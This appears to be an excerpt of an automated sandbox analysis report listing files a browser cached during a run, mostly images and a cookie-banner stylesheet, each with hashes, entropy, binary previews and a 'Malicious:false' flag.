                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43687
                                                                                                                                                                                                                  Entropy (8bit):7.969225527069889
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:I+hYeHsSsmVSPRyrT1evonfQrS2mEItVjSj48Q4OQl88j9+hLI2:I+FMS8Mf1eWIrS2mBVjSU8j88EE2
                                                                                                                                                                                                                  MD5:7E294C6F8BDD4CB3A97E18D1F19D5D67
                                                                                                                                                                                                                  SHA1:01576D3E144E7E8A3BAB9F4F571EEABAD8CB3A92
                                                                                                                                                                                                                  SHA-256:71226FFB7996D891601262EE523358711BD6228B6DD5CBCBE981BC63A1C68F15
                                                                                                                                                                                                                  SHA-512:ED3D574ADFA38A95BE73BB1AC7B2705687068AA69DACB8AA2B1E0549BB09E66EBD5F278340CD52249153BAB58E98116FD16A52DB2AF854F8328E0573DE5D259A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Cm.....'R......q...^..X.9...F$.an........T......mI".*i.H..........UZ.i.=...."...m..dw.....%....n'..k.bI!.h..'v....jy......r$.8...#../.F?.TL5...k...u#s..C..U.....Ev..b.*.;.x..MJ.I.B.Ob4w^....\...).B..O..`,'..P.'...I.5 \.|......5..p..L..N*%...X.s.}..-#M.....QF....Ukid.R.Q.>k..S.;.....a..|;.........:..GRx...dV8S;...Z?.]M...VF.D........d..?.Cp_7.p.6....G0XQh.C..!...<.t..,/..D..S
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARlY5u[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8847
                                                                                                                                                                                                                  Entropy (8bit):7.92872951747314
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QoIu5JEY0X3wbR71MLGhj3zAaUX7mIRfh6buRh7GSS6G8NNBd:bIu5JnO3wfgG5zOhNh75S6G2
                                                                                                                                                                                                                  MD5:55AB93058C68A6E73DA3ECC8BD20A676
                                                                                                                                                                                                                  SHA1:934FBA89D0F813FE652ED149E3722337E27E5594
                                                                                                                                                                                                                  SHA-256:0AB05AF1DDDED42EB51CA2B9E63D0CDF550D75B3E0BBB2527FAB4B13596715D1
                                                                                                                                                                                                                  SHA-512:C4B5E6CBF7EEDBC9E47DD864A7D98841FBD10A07AF4E79E21465BE6968A8664C8B516BFB92D0137ECD5BF72066A022D3F194802B2188FB8731E64DD423CF5AFF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..T...Z..Z.9...Dc.!.z..v...Z.r.."b..d....g.h..q..7.L...a\....?.H..M$..%............1..P....8.h../.i*.O.2H5.SN.;(..9....2....)..n.<1......._...te..0..)...>V....u.....................{.L..pp...."........a..1.q...U'a4t....k.....n.X...R.**.=q).B.j.n..X`..(.!.....c...~..3....;.R..6|...."q.8.z.......-G....9.S".t....B@..I.f......~..2c.PN.N;.S.z.lRnV.}.......(#4..$....n)..K.....g
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARlk9e[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12249
                                                                                                                                                                                                                  Entropy (8bit):7.956964427811286
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QotBbKURPJzPwN2zeqm1uFdjHH+AxjuuTl9yPHHUVDFEHgY02hq5EGWLc8CNwuoE:btBbKY5M2CqFFhUufQHUVDF+A5EGWA8U
                                                                                                                                                                                                                  MD5:366C30F6D8E2BB55F6E205E2CDE0D050
                                                                                                                                                                                                                  SHA1:696CE40E44016525957F3B97C8E2956FA2485C3F
                                                                                                                                                                                                                  SHA-256:B00CCA86CAD14B89A75B8B59ED62891C20F869009FF31F82068F2E4A669EBBA3
                                                                                                                                                                                                                  SHA-512:3EA7E3C753CD471FB729213775501BDF2F0FFE997FCBA3F96C69254F47CBEDA4A291C8587C77C095D2F3FA76167B473E7B229F5F0A32EE7587C36C6FF9D321CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.Lb......(.D...JW...s.H.Q\Yf.l......O....B..S._...A.........fm.......5?..h..............-....:..BR..%....TP...0.v.z.z....8.D.&>.)..`.."...c......".f.....rD.(@.i.Oa\....wFE..Dm "2.8M.9.Z.6o.d..{.->.H/.8...?.....bH..$w.F.0L#.~.-F.2.v.....P(.a....r=.....z.*.../...|....?A.......%..o..Gz...)..T)....-...(.Kw.`B.4e...c.....:.z3.MwRw,nX.s.......O..cK...(O.[s....Y........e..@.`..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARlmVR[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19736
                                                                                                                                                                                                                  Entropy (8bit):7.949340933037777
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:N+gPPP9TWGxoxsFLXqPIHKaFFvr0BFxM+Yr9nxQBuLH:NfnPEOoxsFLXqPGLluxMnfQB6
                                                                                                                                                                                                                  MD5:D3221B6BE6AC204663C8AD2095756C57
                                                                                                                                                                                                                  SHA1:74EF52722F924E4289B83D6A2BCA3EE2F9FE87B8
                                                                                                                                                                                                                  SHA-256:D1177AA2D9C644C3AE5A1571DA4DA613F9F9597C758699F57ED04D6D4FD1A74D
                                                                                                                                                                                                                  SHA-512:8488B3DA5BCDD8EF3B43870967320A8FBB4D3420581C4CAEE318AFF11A088F4C069F25D684A78882C5982A4499AF15FEA9227BAE6B6AF354B6E4A4326F82F11F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....u.......=i0:+2f..j...b..aZ...2..4.9z.cD..%..2i.w`&.rk..Ty aQ.+..!.H..B..?.4....k.j...iv....=*.J1WlM.&...V.I.........6.=..B.d.xSY..mw.X.5Ds.....i.5C.Se/...1W..-|B.9..6..F3[H..d.xX..v.:b.#.s...)...F.@..1.4...b......r.c.@.......@......F..ez4.k..|...*`......2].3XT...bj2..).E&d.s.nfG@.^...7jE.@.Q].:<.2vE....}...3w.jD!......L..7W{...m....u+..1.-..<%q4...l.F...F}k...".m..;]
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARm1Gs[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28102
                                                                                                                                                                                                                  Entropy (8bit):7.964779445035527
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:Ne7EasR4/2EVj4anOnRBZrfCRWbB1zXExGF6KaDajuqvEin:NgsRc2JVrfCCXEWIlqMK
                                                                                                                                                                                                                  MD5:0F4FA917421E275C28C184302D26CA14
                                                                                                                                                                                                                  SHA1:7BF475813898F175F254596D123DC66DAF611343
                                                                                                                                                                                                                  SHA-256:8B8266F23049264186EBE13144D27ABC4BF13C3B24B50DCA313A8477077F2DD9
                                                                                                                                                                                                                  SHA-512:64FD6882A34EF2DDA72E844480A4FE1F4D8EBE86EAB642D4D37439CB714896926F065DD917C6819D3B1F4E09837EF1063A71E0E0789844473A781C3CA80E3C4D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..-.......e.3...j...{. .I=....R.B%;lY..8.k..............N[.....`.v#.]..@.d......&.~.he....;...z.ij.am.i".iHDA.#....Q.K..S*.#.....iro.0Y...^C.RAS....{1.........s.|..$...J......c.2\?.P(|.hL%.R...t].g;0..U..4.z.e..jd...1.M1.>.wGR.6''....K2.ql..H...t$..C...^v.5...{y..)..x.Z..._f.VHQ.A.LG...,....u]&..{\..{'V....E..X......o9..q.tS....C.os..#X.dE...1.sUII..QZ......b.9...H....L...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARmagQ[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20107
                                                                                                                                                                                                                  Entropy (8bit):7.951244765932356
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:NG3/LTABK52Mf7gtcQQ2w0Fo0THLsES73OAbVLJjK6Ra/c2Iz:NY0Dtc2w0+mLrS7zb9Ju6RaS
                                                                                                                                                                                                                  MD5:E8202CFAE2B12C62D5ECB40E2740E900
                                                                                                                                                                                                                  SHA1:6B48D115B1C44021546F85E4199C0CDA594A5765
                                                                                                                                                                                                                  SHA-256:1DFF560E572A3C04531DA0812BC153F9114C32C16FA4016ED6AF2D54C79C6C13
                                                                                                                                                                                                                  SHA-512:24F55720D13C34AE9C3B268EE2B921CA79CCB8D404790A77D690B4CB58C60261795BFE426E162D080948A99CB10F052717A01FDB8212A67CADC059C380AAD3BB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..'n.d...F...r[2.l..ZE>... ..a..@...3c....XH+..5B.6..n.t.....:&.E. .9...3...g%..{..+5.e..I..g.*:..s.x.(.I..|..G#...i.s{D.m..L@.+....z..FP]A.{.....1...=...\....VI%.L..{..;....#L2.O..pJ.i..J..6.B[&..."b...\X.^I...Z!'.7.d.!)....[:.hG&.T......Yk-Y[.FCc.*9JLl...Bz.W\..0V....W...D.+jf2#N.*...yd.8..j..F.*R..b6.....4+..9&..,k....+7.h.....E\a]...-../&...u<.j..2a..x......t.....$3~.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AARmqzU[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):21964
                                                                                                                                                                                                                  Entropy (8bit):7.9578746567637815
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:NNC/kcyWndMiqgSJsFp10qnn90Tg3I1bTQYm0tEIFrTyr8TrAbRDJ4O8J0mN:N8kcbWLJ+p1Vnn90Tg3ep3MCgDm
                                                                                                                                                                                                                  MD5:48FF0856C4879F586A2A8EAE3D611BF7
                                                                                                                                                                                                                  SHA1:4C3048405D65634930622E23A07DB302D25CAEB1
                                                                                                                                                                                                                  SHA-256:4329EADAE80A32A888FEB28D169924B25E65FAAABCEB4811A26D557448C2473E
                                                                                                                                                                                                                  SHA-512:55BBEBD4AF16886B49ED7B8AF0CE053177B458DEA23D7A01FB33DDB9C3DD7DF83DB4049602E32BA67DB5D7FD105D035434981042D2BDB3F39615B11E61912164
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..B......^h....N.q8...p.........$... ..@.s..n;.,..... .a.@....jlZ.@.C....P.H.11RP....47.......jF....Dd.l.\..,z..KV)5.vrws+\I,..s.+iFJ6>rU!R...[p...EL...S.vv.s.CZhe{........-.d.Y4..s.5..}]`.P`gs.I..Z.C......L.v(..i...5x..H.....@...+...L...C...Fi....).q.h....^)....G..C..5@......i...Bc.C.(.4.CB.I.4...E.......4.i..M+..&..H_,.R.I...R.V..'.....l,D..Q.......f@.....G?LQq..f.^Th......
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\AAuTnto[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):777
                                                                                                                                                                                                                  Entropy (8bit):7.619244521498105
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7/+Qh6PGZxqRPb39/w9AoWC42k5a1lhpzlnlA7GgWhZHcJxD2RZyrHTsAew9:++RFzNY9ZWcz/ln2aJ/Hs0/ooXw9
                                                                                                                                                                                                                  MD5:1472AF1857C95AC2B14A1FE6127AFC4E
                                                                                                                                                                                                                  SHA1:D419586293B44B4824C41D48D341BD6770BAFC2C
                                                                                                                                                                                                                  SHA-256:67254D5EFB62D39EF98DD00D289731DE8072ED29F47C15E9E0ED3F9CEDB14942
                                                                                                                                                                                                                  SHA-512:635ED99A50C94A38F7C581616120A73A46BA88E905791C00B8D418DFE60F0EA61232D8DAAE8973D7ADA71C85D9B373C0187F4DA6E4C4E8CF70596B7720E22381
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]S]HSa.~.s.k...Y.....VF.)EfWRQQ.h%]..e.D)..]DA.%...t...Q.....y.Vj.j.3...9.w..}......w...<..>..8xo...2L..............Q....*.4.)../'~......<.3.#....V....T..[M..I).V.a.....EKI-4...b... 6JY...V.t2.%......"Q....`.......`.5.o.)d.S...Q..D....M.U...J.+.1.CE.f.(.....g......z(..H...^~.:A........S...=B.6....w..KNGLN..^..^.o.B)..s?P....v.......q......8.W.7S6....Da`..8.[.z1G"n.2.X.......................2>..q...c......fb...q0..{...GcW@.Hb.Ba.......w....P.....=.)...h..A..`......j.....o...xZ.Q.4..pQ.....>.vT..H..'Du.e..~7..q.`7..QU...S.........d...+..3............%*m|.../.....M..}y.7..?8....K.I.|;5....@...u..6<.yM.%B".,.U..].+...$...%$.....3...L....%.8...A9..#.0j.\lZcg...c8..d......IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\BB1gyWh5[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22695
                                                                                                                                                                                                                  Entropy (8bit):7.810298738669907
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:I/t2lp812AN13D4+f3G7VE3flChB9HKqXOymBVBWzTk1Uvhp3c6:I/uWAOEZelChB9H5ZOIz73z
                                                                                                                                                                                                                  MD5:67E55E01B3746273C0D6440E0229464B
                                                                                                                                                                                                                  SHA1:B0EFBEF2F457E3C497F77D9ACEFE845CD9446801
                                                                                                                                                                                                                  SHA-256:4441E3858AFDA9EA55051473DF78DD2F23BF21CAD83492CBFF9C032CEBA1F657
                                                                                                                                                                                                                  SHA-512:3FD344D0FF4B05BC3FCCC7CD291C5E93841DD620097AC82B5338663A2013DE39463C8E73A51C0DF504553646D9CC5C2721BEAB7B97576B3CE070017BA01CFCBA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....`V.a..c.....;...P..i....r?!w...H..Q.s..d......L.HpFH.(.>y..8...9Q.bS.P;..b.....BU..G....-.\......a.....u;q@.6.....c.........~`...p..^h......(..G.=.."vQ..P.`.y..@2x..,.d.VS..H,E#......B0\....l.....0D`.^(.'.$.).b.C..-L..#...=).X..0(.../=rh........ |.@..'..@..8`@...........}....v.c.....z.!.g.....$.(...).U_\S..E+.AH.!.a.p(.0... ...;.0G..i..2$#s..h.....T.Xd..v0.U.A.._.z.R.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\BB6Ma4a[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):368
                                                                                                                                                                                                                  Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                  MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                  SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                  SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                  SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.*t..|....)....(.$.`..a...d.qd.....3...W_...}.*...;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\a5ea21[1].ico
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):758
                                                                                                                                                                                                                  Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                  MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                  SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                  SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                  SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\cfdbd9[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\otCommonStyles[1].css
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20953
                                                                                                                                                                                                                  Entropy (8bit):5.003252373878778
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:LIsia0zYw49vRn4l7cWQjRkmSxoU/4OIZZTg8l9Qonnq3WwHpUkG4HfeXiPcB2jk:HRc7fQxNGoFBlCHcXaivSYBQY2YpuML
                                                                                                                                                                                                                  MD5:E4F88E3AF211BD9EA203D23CB0B261D5
                                                                                                                                                                                                                  SHA1:6067E95844B3E11A275ADD0B41D7AD3F00A426FD
                                                                                                                                                                                                                  SHA-256:E58322F14AC511762E2C74932104D7205440281520CF98E66F15B40AA8E60D05
                                                                                                                                                                                                                  SHA-512:B2C8870B61E9132DC7D7167F50F7C85BFE67EAC6DA711BDF0B9C85EB026249A95E8D67FFB0699934EAA304F971E44F0180E8578AFD8353943154FCE689690B76
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: #onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-image:url("data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHg9IjBweCIgeT0iMHB4IiB3aWR0aD0iMzQ4LjMzM3B4IiBoZWlnaHQ9IjM0OC4zMzNweCIgdmlld0JveD0iMCAwIDM0OC4zMzMgMzQ4LjMzNCIgc3R5bGU9ImVuYWJsZS1iYWNrZ3
